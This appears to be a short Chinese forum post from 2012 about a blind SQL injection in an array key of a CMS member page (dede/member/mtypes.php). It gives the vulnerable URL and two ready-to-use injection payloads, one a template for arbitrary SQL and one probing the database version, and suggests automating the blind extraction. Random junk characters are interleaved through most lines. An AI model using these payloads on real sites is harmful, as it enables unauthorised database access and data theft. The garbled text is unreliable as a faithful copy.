需要magic_quotes_gpc = Off,所以说是鸡肋啊.) V3 Y6 M8 D0 |' F6 H( l5 f2 u" m
, @- T! N& b8 @( R+ [+ I3 g; } 7 ?* C' B! Q" z
发生在数组key里的注射漏洞,有点意思.
% `% h5 K# ]9 c, { , O; |- `4 I/ a. |; p' N- r ~% I
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
* N; G6 T( b' o$ r' q; O2 {" g
8 ~4 |0 U+ N7 {9 vhttp://www.xxx.com /dede/member/mtypes.php?dopost=save
$ B6 B# W# p% a( Z3 b1 x9 D h & b0 Q9 R1 H; p d. X/ t# f$ C. d1 {
exploit:) K- C6 k% l( d) G8 h& L
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r$ H0 ]% z5 \" n: H: v
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r; s& i% D) [/ F5 F ~' F( n
|
发表于 2012-12-20 08:08:09
收藏
支持
反对